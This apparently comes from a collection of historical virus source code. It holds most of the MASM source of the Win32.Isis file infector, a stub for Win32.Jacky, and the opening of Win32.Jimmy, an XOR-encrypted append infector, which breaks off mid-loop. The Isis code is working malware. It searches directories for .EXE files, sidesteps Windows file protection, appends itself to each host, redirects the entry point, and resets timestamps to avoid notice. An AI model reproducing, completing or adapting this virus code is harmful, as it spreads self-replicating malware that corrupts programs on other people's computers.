CreateFileMappingM MACRO HANDLE:REQ, SIZE:REQ
DO_API tCreateFileMappingA PTR [esi + VX.pCreateFileMappingA], \
HANDLE, 0, PAGE_READWRITE, 0, SIZE, 0
ENDM CreateFileMappingM
ListEntry MACRO POINTER: REQ, STRING:REQ, TYPE:VARARG
p&POINTER DD 0
s&POINTER DB STRING, 0
TYPE
ENDM ListEntry
MapViewOfFileM MACRO HANDLE:REQ
DO_API tMapViewOfFile PTR [esi + VX.pMapViewOfFile], HANDLE, \
FILE_MAP_ALL_ACCESS, NULL, NULL, NULL
ENDM MapViewOfFileM
VirusEntry PROTO
Recurse PROTO VD:PTR VX, RL:PTR RX
AccessFile PROTO VD:PTR VX, RD:PTR RX
PrepareFile PROTO VD:PTR VX, RD:PTR RX, MAP:DWORD
ImportScan PROTO VD:PTR VX, MAP:DWORD, TABLE:DWORD
FinishFile PROTO VD:PTR VX, RD:PTR RX, MAP:DWORD
AlignToVA PROTO VALUE:DWORD, ALIGNER:DWORD
ConvertToVA PROTO MAP:DWORD, VALUE:DWORD
___SfcIsFileProtected PROTO A:DWORD, B:DWORD
___CheckSumMappedFile PROTO A:DWORD, B:DWORD, Y:DWORD, Z:DWORD
; =============================================================================
; ( Virus Structures ) ========================================================
; =============================================================================
VX STRUCT DWORD
VirusEntryPoint DD FRUN_VIRUSRVA
HostsEntryPoint DD FRUN_HOSTSRVA
LoadLibraryRVA DD FRUN_LOADLIBRARYA
GetProcAddressRVA DD FRUN_GETPROCADDRESS
DeltaOffset DD 0
GameOverMan DD 0
FindSpecification DB '*', 0
ExecSpecification DB '.EXE', 0
SectionEntry DD 0
NewFileSize DD 0
NewSectionSize DD 0
ImportList DD VX.pCloseHandle, VX.ImportKernel32, NULL
DD VX.pCompareStringA, VX.ImportKernel32, NULL
DD VX.pCreateFileA, VX.ImportKernel32, NULL
DD VX.pCreateFileMappingA, VX.ImportKernel32, NULL
DD VX.pFindClose, VX.ImportKernel32, NULL
DD VX.pFindFirstFileA, VX.ImportKernel32, NULL
DD VX.pFindNextFileA, VX.ImportKernel32, NULL
DD VX.pGetCurrentDirectoryA, VX.ImportKernel32, NULL
DD VX.pGetFileAttributesA, VX.ImportKernel32, NULL
DD VX.pGetLocalTime, VX.ImportKernel32, NULL
DD VX.pMapViewOfFile, VX.ImportKernel32, NULL
DD VX.pSetCurrentDirectoryA, VX.ImportKernel32, NULL
DD VX.pSetFileAttributesA, VX.ImportKernel32, NULL
DD VX.pSetFileTime, VX.ImportKernel32, NULL
DD VX.pUnmapViewOfFile, VX.ImportKernel32, NULL
DD VX.pMessageBoxA, VX.ImportUser32, NULL
DD VX.pCheckSumMappedFile, VX.ImportImageHlp, AlternSum - WinMain
DD VX.pSfcIsFileProtected, VX.ImportSfc, AlternSfc - WinMain
DD NULL
ImportKernel32 DB 'KERNEL32.DLL', 0
ListEntry CloseHandle, 'CloseHandle', tCloseHandle TYPEDEF PROTO :DWORD
ListEntry CompareStringA, 'CompareStringA', tCompareStringA TYPEDEF PROTO :DWORD,:DWORD,:DWORD,:DWORD,:DWORD,:DWORD
ListEntry CreateFileA, 'CreateFileA', tCreateFileA TYPEDEF PROTO :DWORD,:DWORD,:DWORD,:DWORD,:DWORD,:DWORD,:DWORD
ListEntry CreateFileMappingA, 'CreateFileMappingA', tCreateFileMappingA TYPEDEF PROTO :DWORD,:DWORD,:DWORD,:DWORD,:DWORD,:DWORD
ListEntry FindClose, 'FindClose', tFindClose TYPEDEF PROTO :DWORD
ListEntry FindFirstFileA, 'FindFirstFileA', tFindFirstFileA TYPEDEF PROTO :DWORD,:DWORD
ListEntry FindNextFileA, 'FindNextFileA', tFindNextFileA TYPEDEF PROTO :DWORD,:DWORD
ListEntry GetCurrentDirectoryA, 'GetCurrentDirectoryA', tGetCurrentDirectoryA TYPEDEF PROTO :DWORD,:DWORD
ListEntry GetFileAttributesA, 'GetFileAttributesA', tGetFileAttributesA TYPEDEF PROTO :DWORD
ListEntry GetProcAddress, 'GetProcAddress', tGetProcAddress TYPEDEF PROTO :DWORD,:DWORD
ListEntry GetLocalTime, 'GetLocalTime', tGetLocalTime TYPEDEF PROTO :DWORD
ListEntry LoadLibraryA, 'LoadLibraryA', tLoadLibraryA TYPEDEF PROTO :DWORD
ListEntry MapViewOfFile, 'MapViewOfFile', tMapViewOfFile TYPEDEF PROTO :DWORD,:DWORD,:DWORD,:DWORD,:DWORD
ListEntry SetCurrentDirectoryA, 'SetCurrentDirectoryA', tSetCurrentDirectoryA TYPEDEF PROTO :DWORD
ListEntry SetFileAttributesA, 'SetFileAttributesA', tSetFileAttributesA TYPEDEF PROTO :DWORD,:DWORD
ListEntry SetFileTime, 'SetFileTime', tSetFileTime TYPEDEF PROTO :DWORD,:DWORD,:DWORD,:DWORD
ListEntry UnmapViewOfFile, 'UnmapViewOfFile', tUnmapViewOfFile TYPEDEF PROTO :DWORD
ImportUser32 DB 'USER32.DLL', 0
ListEntry MessageBoxA, 'MessageBoxA', tMessageBoxA TYPEDEF PROTO :DWORD,:DWORD,:DWORD,:DWORD
ImportImageHlp DB 'IMAGEHLP.DLL', 0
ListEntry CheckSumMappedFile, 'CheckSumMappedFile', tCheckSumMappedFile TYPEDEF PROTO :DWORD,:DWORD,:DWORD,:DWORD
ImportSfc DB 'SFC.DLL', 0
ListEntry SfcIsFileProtected, 'SfcIsFileProtected', tSfcIsFileProtected TYPEDEF PROTO :DWORD,:DWORD
VirusTitle DB 'Your Computer Flows With The Spyryt Of Win32.Isis', 0 ; Your Computer Flows With The Spyryt Of Win32.Isis
VirusMessage DB 'Dedicated to our Isis and Horus: Maman vous aime!', 13, 10 ; Dedicated to our Isis and Horus: Maman vous aime!
DB 13, 10 ;
DB 'Create', 9, 'PROTO Mother:PTR Rat, Father:PTR Rat', 13, 10 ; Create PROTO Mother:PTR Rat, Father:PTR Rat
DB 9, '...', 13, 10 ; ...
DB 'Rat', 9, 'STRUCT', 13, 10 ; Rat STRUCT
DB 9, 'Colour', 9, 'DB 10 DUP (?)', 13, 10 ; Colour DB 10 DUP (?)
DB 9, 'Length', 9, 'DD ?', 13, 10 ; Length DD ?
DB 'Rat', 9, 'ENDS', 13, 10 ; Rat ENDS
DB 9, '...', 13, 10 ; ...
DB 'Isis', 9, 'Rat {''Drk', 9, 'Blonde'', 9}', 9, '; Mother', 13, 10 ; Isis Rat {'Drk Blonde', 9} ; Mother
DB 'Horus', 9, 'Rat {''Ash', 9, 'Blonde'', 7}', 9, '; Father', 13, 10 ; Horus Rat {'Ash Blonde', 7} ; Father
DB 9, '...', 13, 10 ; ...
DB 9, 'INVOKE Create, ADDR Isis, ADDR Horus', 13, 10 ; INVOKE Create, ADDR Isis, ADDR Horus
DB 9, '...', 13, 10 ; ...
DB 'Create', 9, 'PROC', 9, 'USES', 9, 'EBX ECX EDX ESI EDI,', 13, 10 ; Create PROC USES EBX ECX EDX ESI EDI
DB 9, 9, 9, 'Mother:PTR Rat, Father:PTR Rat', 13, 10 ; Mother:PTR Rat, Father:PTR Rat
DB 9, 9, 'LOCAL', 9, 'Daughter:Rat', 13, 10 ; LOCAL Daughter:Rat
DB 13, 10 ;
DB 9, 'mov esi,', 9, '[Mother', 9, ']', 13, 10 ; mov esi, [Mother]
DB 9, 'mov esi,', 9, '[esi', 9, ']', 13, 10 ; mov esi, [esi]
DB 9, 'mov ebx,', 9, '[esi + Rat.Length', 9, ']', 13, 10 ; mov ebx, [esi + Rat.Length]
DB 9, 'mov edi,', 9, '[Father', 9, ']', 13, 10 ; mov edi, [Father]
DB 9, 'mov edi,', 9, '[edi', 9, ']', 13, 10 ; mov edi, [edi]
DB 9, 'add ebx,', 9, '[edi + Rat.Length', 9, ']', 13, 10 ; add ebx, [edi + Rat.Length]
DB 9, 'shr ebx,', 9, 9, '1', 13, 10 ; shr ebx, 1
DB 9, 'mov [Daughter.Length],', 9, 'ebx', 13, 10 ; mov [Daughter.Length], ebx
DB 9, '...', 13, 10 ; ...
DB 13, 10, 0 ;
ALIGN 4
VX ENDS
RX STRUCT DWORD
FindData WIN32_FIND_DATA {?}
FindHandle DD ?
NewDirectory DD MAX_PATH DUP (?)
CurrentDirectory DD MAX_PATH DUP (?)
LastRecurse DD ?
ALIGN 4
RX ENDS
; =============================================================================
; ( Virus EntryPoint ) ========================================================
; =============================================================================
Virus SEGMENT 'CODE'
WinMain:
push NULL ; Updated to become HostsEntryPoint later
VirusEntry PROC
LOCAL VD:VX
; Save the registers for our host, calculate WinMain VA and Delta Offset
pusha
pushfd
call @F
@@: pop esi
sub esi, 12h ; @B - WinMain
mov eax, esi
sub esi, offset WinMain
push esi
; Copy our data section into the allocated stack area. Must be / DWORD.
lea esi, [esi][Virus_Data]
lea edi, [VD]
mov ecx, Size VD / 4
cld
rep movsd
pop [VD.DeltaOffset ]
; ImageBase = WinMain VA - WinMain RVA. Convert critical API RVA to VA.
sub eax, [VD.VirusEntryPoint ]
push eax
add eax, [VD.LoadLibraryRVA ]
mov eax, [eax]
mov [VD.pLoadLibraryA], eax
pop eax
push eax
add eax, [VD.GetProcAddressRVA]
mov eax, [eax]
mov [VD.pGetProcAddress], eax
pop eax
; Overwrite the NULL we stored on the stack with our Hosts EntryPoint VA
add eax, [VD.HostsEntryPoint ]
mov [ebp + DWORD], eax
; Parse our ImportList. Formatted as: API RVA, DLL RVA, ALTERNATE RVA.
lea esi, [VD.ImportList]
@@: lodsd ; RVA of API DWORD
or eax, eax ; NULL if List End
jz @F ; Stop if it's the end of this List
lea edi, [eax][VD] ; EDI = Where to write final API VA
lea ebx, [eax][VD][4] ; API Name String follows API DWORD
lodsd ; DLL Name String RVA
DO_API tLoadLibraryA PTR [VD.pLoadLibraryA ], ADDR [VD][eax]
DO_API tGetProcAddress PTR [VD.pGetProcAddress], eax, ebx
stosd ; Save VA into API VA
or eax, eax ; Check if successful
lodsd ; Alternate Entry RVA
jnz @B ; Loop back if all OK
or eax, eax ; Check if Alternate doesn't exist
jz WinExit ; Abort, because we need something
add eax, offset WinMain
add eax, [VD.DeltaOffset]
mov [edi][-4], eax
jmp @B ; Save Alternates VA and loop back
@@: ; Initialize counter, recurse through directories for infectable files
mov [VD.GameOverMan], NULL
DO_API Recurse, ADDR [VD], NULL
; Check if the date is 21st of November which is when Isis passed away
DO_API tGetLocalTime PTR [VD.pGetLocalTime], ADDR [VD]
cmp WORD PTR [VD][2], 11
jne WinExit
cmp WORD PTR [VD][6], 20
jne WinExit
DO_API tMessageBoxA PTR [VD.pMessageBoxA], NULL, ADDR [VD.VirusMessage], ADDR [VD.VirusTitle], NULL
WinExit:
popfd
popa
ret
VirusEntry ENDP
; =============================================================================
; ( Directory/File Recursion ) ================================================
; =============================================================================
Recurse PROC VD:Ptr VX, RL:Ptr RX
LOCAL RD:RX
; Search for the first entry in our current directory
mov esi, [VD]
mov eax, [RL]
mov [RD.LastRecurse], eax
DO_API tFindFirstFileA PTR [esi][VX.pFindFirstFileA], ADDR [esi][VX.FindSpecification], ADDR [RD.FindData]
mov [RD.FindHandle], eax
cmp eax, INVALID_HANDLE_VALUE
je RecurseExit
RecurseOkay:
; Don't touch files or directories with these strange attributes set
test dword ptr [RD.FindData.FileAttributes], AVOIDED_FILES
jnz RecurseNext
; Split between file / directory routines
test dword ptr [RD.FindData.FileAttributes], FILE_ATTRIBUTE_DIRECTORY
jnz RecurseDirs
; Locate end of file name
lea edi, [RD.FindData.FileName ]
xor eax, eax
mov ecx, MAX_PATH
repnz scasb
jnz RecurseNext
sub edi, 5
; Compare extension with .EXE
lea eax, [esi][VX.ExecSpecification]
CompareStringM eax, edi
cmp eax, 2
jne RecurseNext
; Check if it's under SFC protection or if it's too big for us to handle
DO_API tSfcIsFileProtected PTR [esi][VX.pSfcIsFileProtected], NULL, ADDR [RD.FindData.FileName]
or eax, eax
jnz @F
cmp [RD.FindData.FileSizeHigh], 0
jne @F
DO_API AccessFile, [VD], ADDR [RD]
@@: jmp RecurseNext
RecurseDirs:
; Don't recurse if we've recursed enough. Save the current directory and
; change to the new one and save its full directory name as well.
cmp [esi][VX.GameOverMan], GAME_OVER_MAX
je RecurseNext
DO_API tGetCurrentDirectoryA PTR [esi][VX.pGetCurrentDirectoryA], MAX_PATH, ADDR [RD.CurrentDirectory ]
cmp eax, NULL
je RecurseNext
DO_API tSetCurrentDirectoryA PTR [esi][VX.pSetCurrentDirectoryA], ADDR [RD.FindData.FileName]
cmp eax, NULL
je RecurseNext
DO_API tGetCurrentDirectoryA PTR [esi][VX.pGetCurrentDirectoryA], MAX_PATH, ADDR [RD.NewDirectory ]
cmp eax, NULL
je RecurseNext
; Loop through each Recurse stack comparing New to Currents
lea ebx, [RD.NewDirectory ]
lea edi, [RD]
@@: lea ecx, [edi][RX.CurrentDirectory]
CompareStringM ecx, ebx
cmp eax, 2
je RecurseMatch
mov edi, [edi][RX.LastRecurse]
or edi, edi
jnz @B
inc [esi][VX.GameOverMan ]
DO_API Recurse, [VD], ADDR [RD]
dec [esi][VX.GameOverMan ]
RecurseMatch:
DO_API tSetCurrentDirectoryA PTR [esi][VX.pSetCurrentDirectoryA], ADDR [RD.CurrentDirectory]
RecurseNext:
; Abort if we've recursed and infected enough
cmp [esi][VX.GameOverMan], GAME_OVER_MAX
je RecurseCleanup
; Continue the search for files / directories
DO_API tFindNextFileA PTR [esi][VX.pFindNextFileA], [RD.FindHandle], ADDR [RD.FindData ]
or eax, eax
jne RecurseOkay
RecurseCleanup:
; Close our search handle and exit
DO_API tFindClose PTR [esi][VX.pFindClose], [RD.FindHandle]
RecurseExit:
ret
Recurse ENDP
; =============================================================================
; ( File Access Moderator ) ===================================================
; =============================================================================
AccessFile PROC VD:PTR VX, RD:PTR RX
; Remove attributes only if necessary
mov esi, [VD]
mov edi, [RD]
test [esi][RX.FindData.FileAttributes], FILE_ATTRIBUTE_READONLY OR FILE_ATTRIBUTE_SYSTEM
jz @F
DO_API tSetFileAttributesA PTR [esi][VX.pSetFileAttributesA], ADDR [edi][RX.FindData.FileName], FILE_ATTRIBUTE_NORMAL
or eax, eax
jz AccessExit
@@: ; Open the file fully, saving each handle on the stack as we go
CreateFileM ADDR [edi][RX.FindData.FileName]
cmp eax, INVALID_HANDLE_VALUE
je AccessAttributes
push eax
push eax
CreateFileMappingM eax, 0
or eax, eax
jz AccessCloseFile
push eax
MapViewOfFileM eax
cmp eax, INVALID_HANDLE_VALUE
jz AccessCloseMap
push eax
; Prepare the file for infection by making sure headers are correct,
; working out how much space we will add to the file sections, etc
DO_API PrepareFile, [VD], [RD], eax
or eax, eax
jz AccessCloseView
; Close the file and reopen it bigger to fit the virus inside
pop eax
DO_API tUnmapViewOfFile PTR [esi][VX.pUnmapViewOfFile], eax
pop eax
DO_API tCloseHandle PTR [esi][VX.pCloseHandle], eax
pop eax
push eax
CreateFileMappingM eax, [esi][VX.NewFileSize]
or eax, eax
jz AccessCloseFile
push eax
MapViewOfFileM eax
cmp eax, INVALID_HANDLE_VALUE
jz AccessCloseMap
push eax
; Finish up infecting the file and increment infection counter
DO_API FinishFile, [VD], [RD], eax
or eax, eax
jz AccessCloseView
inc [esi][VX.GameOverMan ]
AccessCloseView:
pop eax
DO_API tUnmapViewOfFile PTR [esi][VX.pUnmapViewOfFile], eax
AccessCloseMap:
pop eax
DO_API tCloseHandle PTR [esi][VX.pCloseHandle], eax
AccessCloseFile:
; Reset file stamps so that we don't look too suspicious
pop ebx
DO_API tSetFileTime PTR [esi][VX.pSetFileTime], ebx, ADDR [edi][RX.FindData.LastWriteTime], ADDR [edi][RX.FindData.LastAccessTime], ADDR [edi][RX.FindData.CreationTime]
pop eax
DO_API tCloseHandle PTR [esi][VX.pCloseHandle], eax
AccessAttributes:
; Restore attributes only if they were changed
test [esi][RX.FindData.FileAttributes], FILE_ATTRIBUTE_READONLY OR \
FILE_ATTRIBUTE_SYSTEM
jz AccessExit
DO_API tSetFileAttributesA PTR [esi][VX.pSetFileAttributesA], ADDR [edi][RX.FindData.FileName], [edi][RX.FindData.FileAttributes]
AccessExit:
ret
AccessFile ENDP
; =============================================================================
; ( Infection Preparation ) ===================================================
; =============================================================================
PrepareFile PROC VD:PTR VX, RD:PTR RX, MAP:DWORD
; Is the file already infected?
mov esi, [VD ]
mov edi, [MAP]
cmp [edi][IMAGE_DOS_HEADER.e_csum], -1
je PrepareFail
cmp [edi][IMAGE_DOS_HEADER.e_magic], IMAGE_DOS_SIGNATURE
jne PrepareFail
; Are the standard COFF headers okay?
add edi, [edi][IMAGE_DOS_HEADER.e_lfanew]
cmp [edi][PE.Signature], IMAGE_NT_SIGNATURE
jne PrepareFail
cmp [edi][PE.Machine], IMAGE_FILE_MACHINE_I386
jne PrepareFail
cmp [edi][PE.SizeOfOptionalHeader], IMAGE_SIZEOF_NT_OPTIONAL32_HEADER
jne PrepareFail
cmp [edi][PE.Magic], IMAGE_NT_OPTIONAL_HDR32_MAGIC
jne PrepareFail
cmp [edi][PE.SizeOfHeaders], 0
je PrepareFail
; Do some checks on the Import Table
cmp [edi][PE.NumberOfRvaAndSizes], 2
jb PrepareFail
cmp [edi][PE.DataDirectory.Import.Sizes], 0
je PrepareFail
DO_API ConvertToVA, [MAP], [edi][PE.DataDirectory.Import.RVA]
mov edx, eax
or edx, edx
jz PrepareFail
; Loop through each IMPORT Entry looking for a 'Kernel32.DLL' Name. For
; each found we ImportScan for our LoadLibraryA and GetProcAddress. We
; can get both from the one IMPORT Entry, or if only one is found, then
; we continue scanning incase there are multiple 'Kernel32.DLL', IMPORT
; entries with procedures split across them.
mov ecx, [edi][PE.DataDirectory.Import.Sizes]
mov [esi][VX.LoadLibraryRVA], 0
mov [esi][VX.GetProcAddressRVA], 0
@@: DO_API ConvertToVA, [MAP], [edx][IMPORT.Names ]
or eax, eax
jz PrepareFail
lea ebx, [esi][VX.ImportKernel32]
CompareStringM eax, ebx
cmp eax, 2
jne PrepareNext
DO_API ImportScan, [VD], [MAP], edx
or eax, eax
jnz @F
PrepareNext:
add edx, SIZE IMPORT
sub ecx, SIZE IMPORT
jz PrepareFail
cmp ecx, [edi][PE.DataDirectory.Import.Sizes]
jae PrepareFail
jmp @B
@@: ; Scan through the SECTION Table and find the last 'Physical' SECTION. We
; save its RVA because its VA won't be valid when FinalFile needs it.
movzx ecx, [edi][PE.NumberOfSections ]
add di, [edi][PE.SizeOfOptionalHeader ]
adc edi, PE.Magic
xor eax, eax
PrepareSection:
; Also check there are no 'bad' entries
cmp [edi][SECTION.VirtualSize], 0
je PrepareFail
cmp [edi][SECTION.SizeOfRawData], 0
je PrepareFail
cmp [edi][SECTION.PointerToRawData], eax
jb @F
mov eax, [edi][SECTION.PointerToRawData]
mov edx, edi
@@: add edi, SIZE SECTION
loop PrepareSection
mov edi, edx
sub edx, [MAP]
mov [esi][VX.SectionEntry], edx
; Calculate how big the SECTION will be to completely engulf the rest of
; the file [including DEBUG information] and save as VirusEntryPoint
mov edx, [RD]
mov eax, [edx][RX.FindData.FileSizeLow ]
sub eax, [edi][SECTION.PointerToRawData]
push eax
add eax, [edi][SECTION.VirtualAddress ]
mov [esi][VX.VirusEntryPoint], eax
pop eax
; Calculate the SECTION + Slack + Virus + Padding Size
mov edx, [MAP]
add edx, [edx][IMAGE_DOS_HEADER.e_lfanew ]
add eax, Virus_Size
DO_API AlignToVA, eax, [edx][PE.FileAlignment]
mov [esi + VX.NewSectionSize], eax
add eax, [edi][SECTION.PointerToRawData ]
jc PrepareFail
mov [esi][VX.NewFileSize], eax
mov eax, -1
jmp PrepareExit
PrepareFail:
xor eax, eax
PrepareExit:
ret
PrepareFile ENDP
; =============================================================================
; ( Infection Import Scanner ) ================================================
; =============================================================================
ImportScan PROC VD:PTR VX, MAP:DWORD, TABLE:DWORD
; Locate the correct Thunk List which is swapped between MASM and TASM
mov esi, [VD]
mov edi, [TABLE]
mov eax, [edi][IMPORT.OriginalFirstThunk]
or eax, eax
jnz @F
mov eax, [edi][IMPORT.FirstThunk ]
@@: DO_API ConvertToVA, [MAP], eax
or eax, eax
jz ImportExit
mov edi, eax
xor ecx, ecx
; Check if entry is the last in the table. If not, skip it if it's an
; Ordinal entry, or load up where it points to and skip the Hint.
ImportLoop:
mov eax, [edi]
or eax, eax
jz ImportFinish
js ImportNext
DO_API ConvertToVA, [MAP], eax
or eax, eax
jz ImportFail
inc eax
inc eax
; Compare the string to our GetProcAddress string. If it matches, we
; move onto the 'save' section which is pointed to by EDX. We saved
; EAX for our next compare.
push eax
lea edx, [esi][VX.GetProcAddressRVA ]
CompareStringM ADDR [esi][VX.sGetProcAddress ], eax
cmp eax, 2
pop eax
je @F
; Compare the string to our LoadLibraryA string. If it matches, we
; move onto the 'save' section which is pointed to by EDX. We didn't
; save EAX, it's not needed anymore.
lea edx, [esi][VX.LoadLibraryRVA ]
CompareStringM ADDR [esi][VX.sLoadLibraryA ], eax
cmp eax, 2
jne ImportNext
@@: ; FirstThunk is the one that will be overwritten with the VAs of API on
; execution, wether linked with MASM or TASM. Save its RVA for later.
mov ebx, [TABLE ]
mov ebx, [ebx][IMPORT.FirstThunk]
lea ebx, [ebx + ecx * 4 ]
mov [edx], ebx
ImportNext:
inc ecx
add edi, 4
jmp ImportLoop
ImportFinish:
; Failed by default, meaning continue searching for more Kernel32.DLL
; Imports. If both API have been filled in, the loop routine that has
; called us can stop searching.
mov eax, -1
cmp [esi][VX.LoadLibraryRVA], 0
je ImportFail
cmp [esi][VX.GetProcAddressRVA], 0
jne ImportExit
ImportFail:
xor eax, eax
ImportExit:
ret
ImportScan ENDP
; =============================================================================
; ( Infection Finishing ) =====================================================
; =============================================================================
FinishFile PROC VD:PTR VX, RD:PTR RX, MAP:DWORD
; Set our infection marker
mov esi, [VD ]
mov edi, [MAP]
mov [edi][IMAGE_DOS_HEADER.e_csum], -1
; ESI = VD, EDI = PE, EDX = SECTION
mov edx, [esi][VX.SectionEntry ]
lea edx, [edi][edx ]
add edi, [edi][IMAGE_DOS_HEADER.e_lfanew]
push edi
; Write all new SECTION fields
mov eax, [edx][SECTION.VirtualSize ]
cmp eax, [edx][SECTION.SizeOfRawData ]
ja @F
mov eax, [edx][SECTION.SizeOfRawData ]
@@: DO_API AlignToVA, eax, [edi][PE.SectionAlignment ]
sub [edi][PE.SizeOfImage], eax
DO_API AlignToVA, [esi][VX.NewSectionSize], [edi][PE.SectionAlignment]
add [edi][PE.SizeOfImage], eax
mov ebx, [esi][VX.NewSectionSize]
mov [edx][SECTION.VirtualSize ], ebx
mov [edx][SECTION.SizeOfRawData ], ebx
or [edx][SECTION.Characteristics], IMAGE_SCN_MEM_READ
; Decide what SizeOfX SECTION we're in, subtract and update
mov eax, [edx][SECTION.VirtualSize ]
cmp eax, [edx][SECTION.SizeOfRawData ]
ja @F
mov eax, [edx][SECTION.SizeOfRawData ]
@@: lea ecx, [edi][PE.SizeOfCode ]
test [edx][SECTION.Characteristics], IMAGE_SCN_CNT_CODE
jnz @F
lea ecx, [edi][PE.SizeOfInitializedData ]
test [edx][SECTION.Characteristics], IMAGE_SCN_CNT_INITIALIZED_DATA
jnz @F
lea ecx, [edi][PE.SizeOfUninitializedData ]
@@: DO_API AlignToVA, eax, [edi][PE.FileAlignment]
sub [ecx], eax
mov eax, [esi][VX.NewSectionSize ]
add [ecx], eax
; Set the new EntryPoint and save the old one
mov ebx, [esi][VX.VirusEntryPoint ]
push ebx
xchg [edi][PE.AddressOfEntryPoint], ebx
mov [esi][VX.HostsEntryPoint], ebx
pop ebx
; Write the code section of the virus
DO_API ConvertToVA, [MAP], ebx
push esi
mov esi, [esi][VX.DeltaOffset]
lea esi, [esi][WinMain ]
mov edi, eax
mov ecx, Virus_Code / 4
rep movsd
pop esi
; Write the data section of the virus
push esi
mov ecx, Size VX / 4
rep movsd
pop esi
; Do the checksums, one of which is pointing to a junk area
pop ebx
DO_API tCheckSumMappedFile PTR [esi][VX.pCheckSumMappedFile], [MAP], [esi][VX.NewFileSize], ADDR [esi][VX.SectionEntry], ADDR [ebx][PE.CheckSum]
FinishExit:
ret
FinishFile ENDP
; =============================================================================
; ( Align to Boundary ) =======================================================
; =============================================================================
AlignToVA PROC VALUE:DWORD, ALIGNER:DWORD
; EDX:EAX = VALUE. Divide by ECX, subtract remainder and add ALIGNER.
mov eax, [VALUE ]
xor edx, edx
mov ecx, [ALIGNER]
div ecx
or edx, edx
mov eax, [VALUE ]
jz AlignExit
add eax, [ALIGNER]
AlignExit:
sub eax, edx
ret
AlignToVA ENDP
; =============================================================================
; ( Convert RVA to VA ) =======================================================
; =============================================================================
ConvertToVA PROC MAP:DWORD, VALUE:DWORD
mov esi, [MAP ]
mov edi, [VALUE]
or edi, edi
jz ConvertFail
; Locate start of SECTION in MAP, prepare for looping through them all
add esi, [esi][IMAGE_DOS_HEADER.e_lfanew]
movzx ecx, [esi][PE.NumberOfSections ]
add si, [esi][PE.SizeOfOptionalHeader ]
adc esi, PE.Magic
ConvertLoop:
; Jump over this section entry if it starts above our RVA
cmp [esi][SECTION.VirtualAddress], edi
ja ConvertNext
; To find out where the section ends in the file, we need to check the
; SizeOfRawData and VirtualSize entries and use the biggest one. Know
; now that TASM and MASM swap the meanings of these entries. Bitches.
mov eax, [esi][SECTION.SizeOfRawData ]
cmp eax, [esi][SECTION.VirtualSize ]
ja @F
mov eax, [esi][SECTION.VirtualSize ]
@@: add eax, [esi][SECTION.VirtualAddress]
; Jump over this section entry if it ends below our RVA
cmp eax, edi
jbe ConvertNext
; Fail if this entry doesn't exist in the file [could be memory only]
cmp [esi][SECTION.PointerToRawData], 0
je ConvertFail
; Convert raw pointer to VA and add our value's pointers offset to it
mov eax, [MAP]
add eax, [esi][SECTION.PointerToRawData]
sub edi, [esi][SECTION.VirtualAddress ]
add eax, edi
jmp ConvertExit
ConvertNext:
add esi, SIZE SECTION
loop ConvertLoop
ConvertFail:
xor eax, eax
ConvertExit:
ret
ConvertToVA ENDP
; =============================================================================
; ( Alternate SfcIsFileProtected ) ============================================
; =============================================================================
AlternSfc PROC A:DWORD, B:DWORD
; Alternate SfcIsFileProtected procedure, returns "File Unprotected"
mov eax, FALSE
ret
AlternSfc ENDP
; =============================================================================
; ( Alternate CheckSumMappedFile ) ============================================
; =============================================================================
AlternSum PROC A:DWORD, B:DWORD, Y:DWORD, Z:DWORD
; Alternate CheckSumMappedFile procedure, returns "NULL Checksum OK"
mov eax, [Z]
mov ebx, NULL
xchg [eax], ebx
mov eax, [Y]
mov [eax], ebx
mov eax, [A]
add eax, [eax][IMAGE_DOS_HEADER.e_lfanew]
ret
AlternSum ENDP
; =============================================================================
; ( Virus Data ) ==============================================================
; =============================================================================
ALIGN 4
Virus_Code EQU $ - WinMain
Virus_Data VX { }
Virus_Size EQU $ - WinMain
Virus ENDS
END WinMain
COMMENT ` ---------------------------------------------------------------- )=-
-=( Natural Selection Issue #1 --------------- (c) 2002 Feathered Serpents )=-
-=( ---------------------------------------------------------------------- ) `
Win32/Infector/Win32.Jacky.1440.asm
+1153
View File
File diff suppressed because it is too large Load Diff
Win32/Infector/Win32.Jimmy.asm
+820
View File
@@ -0,0 +1,820 @@
; Win32.Jimmy by SST@Hablas.com
;
; Infektion bei Win95/98/ME, WinNt4.0, WinNT2000
; Variable Xor Encryption
; Append Infector
;
; Yes, this is my first W32.Virus
.586p
.model flat
jumps
.radix 16
extrn ExitProcess:PROC
.data
Data:
filemask db '*.Exe',0
FileHandle dd 0h
NewSize dd 0h
AlignReg1 dd 0h
InfCounter dd 0h
APICRC32 dd 0h
Trash2 dd 0h
DirectoryBuffer db 255d dup (0h)
KernelMZ dd 0h
OTableVA dd 0h
MapHandle dd 0h
OldDirectory db 255d dup (0h)
K32Trys dd 0h
counter dw 0h
AlignReg2 dd 0h
APINames:
dd 0FE248274h
dd 08C892DDFh
dd 0EBC6C18Bh
dd 0B2DBD7DCh
dd 0613FD7BAh
dd 0AE17EBEFh
dd 096B2D96Ch
dd 0AA700106h
dd 094524B42h
dd 0797B49ECh
dd 0C200BE21h
dd 068624A9Dh
ATableVA dd 0h
TempApisearch2 dd 0h
APIOffsets:
XGetWindowsDirectoryA dd 0h
XCreateFileA dd 0h
XGetCurrentDirectoryA dd 0h
XSetCurrentDirectoryA dd 0h
XGetTickCount dd 0h
XFindFirstFileA dd 0h
XCreateFileMappingA dd 0h
XFindNextFileA dd 0h
XUnmapViewOfFile dd 0h
XMapViewOfFile dd 0h
XFindClose dd 0h
XCloseHandle dd 0h
TempAPI dd 0h
KernelPE dd 0h
RandVal dd 0h
FindHandle dd 0h
OldEIP dd 0h
NewEIP dd 0h
MapAddress dd 0h
alte dd 0h
NTableVA dd 0h
Trash1 dd 0h
FILETIME STRUC
FT_dwLowDateTime dd ?
FT_dwHighDateTime dd ?
FILETIME ENDS
WIN32_FIND_DATA label byte
WFD_dwFileAttributes dd ?
WFD_ftCreationTime FILETIME ?
WFD_ftLastAccessTime FILETIME ?
WFD_ftLastWriteTime FILETIME ?
WFD_nFileSizeHigh dd ?
WFD_nFileSizeLow dd ?
WFD_dwReserved0 dd ?
WFD_dwReserved1 dd ?
WFD_szFileName db 260d dup (?)
WFD_szAlternateFileName db 13 dup (?)
WFD_szAlternateEnding db 03 dup (?)
groese equ (offset EndVirus - offset Virus )
NumberOfApis equ 12
encrypted = ( ( offset endofcrypt - offset encgo ) / 2 ) + 1
.code
VirusCode:
Virus:
call Delta
dw 15662d
dw 31058d
codeofcrypt dw 0h
Delta:
mov edx, dword ptr [esp]
inc esp
add esp, 3d
sub edx, ( offset Delta - 6)
mov ebp, edx
mov edi, ebp
or edi, edi
jz encgo
mov edx, encrypted
lea ecx, [ebp+encgo]
encgoloop:
xor bx, word ptr [ebp+codeofcrypt]
